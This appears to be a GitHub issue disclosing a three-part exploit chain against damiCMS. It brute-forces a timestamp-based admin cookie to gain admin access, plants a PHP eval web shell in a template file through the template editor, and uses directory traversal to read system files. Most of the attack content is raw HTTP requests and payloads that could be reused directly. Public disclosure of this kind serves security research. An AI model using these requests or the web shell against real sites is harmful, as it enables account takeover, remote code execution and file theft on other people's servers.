Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Get a damiCMS‘s admin permission by Force authentication #2

Open
howchen opened this issue Aug 29, 2018 · 1 comment
Open

Get a damiCMS‘s admin permission by Force authentication #2

howchen opened this issue Aug 29, 2018 · 1 comment

Comments

@howchen
Copy link
Owner

howchen commented Aug 29, 2018

PART 1 : get the admin authenticaton

Here is a default damiCMS's admin user's cookie:

Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D

the BkGOp9578O_1535522538=czoxOiIxIjs%3D would be updated when admin logins in,
"BkGOp9578O_" is a COOKIE_PREFIX by default, "1533522538" comes from time() function in php, the cookie is valided for 3 hours, it means we can get the admin permission just by Enumerating maximum 10800 times if the admin logged In。

  1. get a string by time() function
    ----genera.php
    <?php echo time();?>

  2. crafted a request

GET /damiCMS/admin.php?s=/Article/index HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8899/damiCMS/admin.php?s=/Index/index
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
Connection: close
Upgrade-Insecure-Requests: 1
  1. Send to intruder,,configuraton the Positions and Payloads
    e.g. BkGOp9578O_15355$22538$=czoxOiIxIjs%3D

PART 2 : Remote Code Execution

when logined as a admin (By part1), There is a Remote Code Execution vulnerability

  1. edit and update the file with the code <?php @eval($_GET["code"]);?>
    ./Web/Tpl/default/head.html
POST /damiCMS/admin.php?s=/Tpl/Update.html HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8899/damiCMS/admin.php?s=Tpl/Add/id/.|Web|Tpl|default|head*html
Content-Type: multipart/form-data; boundary=---------------------------76232591619489
Content-Length: 3962
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------76232591619489
Content-Disposition: form-data; name="filename"

./Web/Tpl/default/head.html
-----------------------------76232591619489
Content-Disposition: form-data; name="content"

<?php @eval($_GET["code"]); ?>	
-----------------------------76232591619489
Content-Disposition: form-data; name="submit"

� �
-----------------------------76232591619489--
  1. visite the url below
    http://localhost:8899/damiCMS/index.php?cmd=phpinfo();

PART 3 : Directory Traversal

when logined as a admin (By part1), There is a Directory Traversal vulnerability
read the content of c:/windows/win.in

GET /damiCMS/admin.php?s=Tpl/Add/id/c:|windows|win.ini HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8899/damiCMS/admin.php?s=Tpl/index/id/.|Web|Tpl|default
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
Connection: close
Upgrade-Insecure-Requests: 1
@cchaoming
Copy link

no use how to into admin backend and edit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants